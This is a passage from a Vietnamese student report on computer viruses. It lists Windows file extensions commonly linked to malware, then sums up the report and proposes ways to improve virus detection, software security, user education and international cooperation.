.msi: Microsoft Installer File (Tệp cài đặt) pif: Program Information File (Tệp thông tin chương trình) reg: Registry File (Tệp can thiệp và chỉnh sửa Registry) scr: Screen Saver (Portable Executable File)
.sct: Windows Script Component shb: Document Shortcut File shs: Shell Scrap Object vb: Visual Basic File vbe: Visual Basic Encoded Script File vbs: Visual Basic File (Tệp được lập trình bởi Visual Basic) wsc: Windows Script Component
.wsf: Windows Script File wsh: Windows Script Host File {*}: Class ID (CLSID) File Extensions
TỔNG KẾT Bài báo cáo về tìm hiểu về các loại virus máy tính và cách phòng chống đã đạt được nhiều kết quả quan trọng Từ bài báo cáo, chúng ta đã biết được khái niệm về virus máy tính, cách thức lây nhiễm của chúng, các loại virus phổ biến và cách phòng chống hiệu quả Bài báo cáo cũng đưa ra những lời khuyên hữu ích để người dùng có thể bảo vệ máy tính của mình khỏi các loại virus độc hại.
Tuy nhiên, bài báo cáo còn một số hạn chế Nó không đề cập đến các loại virus mới nhất và cách phòng chống chúng Ngoài ra, bài báo cáo cũng không đưa ra các ví dụ cụ thể về các trường hợp bị nhiễm virus máy tính và cách xử lý chúng. Để bảo vệ máy tính của mình khỏi các loại virus độc hại, người dùng cần phải tìm hiểu thêm thông tin về các loại virus mới nhất và cách phòng chống chúng.
Họ cũng cần phải có kế hoạch cụ thể để xử lý các trường hợp bị nhiễm virus máy tính.
Virus máy tính là một vấn đề nghiêm trọng trong thời đại công nghệ số hiện nay. Để phát triển các giải pháp phòng chống virus máy tính trong tương lai, chúng ta có thể đề xuất một số phương hướng như sau:
Phát triển các công nghệ mới để phát hiện và loại bỏ virus: Các nhà nghiên cứu có thể phát triển các công nghệ mới để phát hiện và loại bỏ virus máy tính Các công nghệ này có thể bao gồm trí tuệ nhân tạo, học sâu, và các thuật toán khai phá dữ liệu mới nhất.
Tăng cường hệ thống bảo mật: Các nhà sản xuất phần mềm có thể tăng cường hệ thống bảo mật của các sản phẩm của họ để ngăn chặn các cuộc tấn công từ các loại virus mới Họ cũng có thể cung cấp các bản cập nhật thường xuyên để bảo vệ người dùng khỏi các loại virus độc hại.
Tăng cường giáo dục và nâng cao nhận thức của người dùng: Người dùng cần được giáo dục về các loại virus máy tính và cách phòng
25 chống chúng Họ cũng cần phải có nhận thức rõ về các nguy cơ của việc sử dụng các phần mềm không bản quyền và các trang web không an toàn.
Hợp tác quốc tế: Các quốc gia có thể hợp tác với nhau để phát triển các giải pháp phòng chống virus máy tính toàn cầu Họ có thể chia sẻ thông tin và kinh nghiệm để giúp ngăn chặn các cuộc tấn công từ các loại virus mới.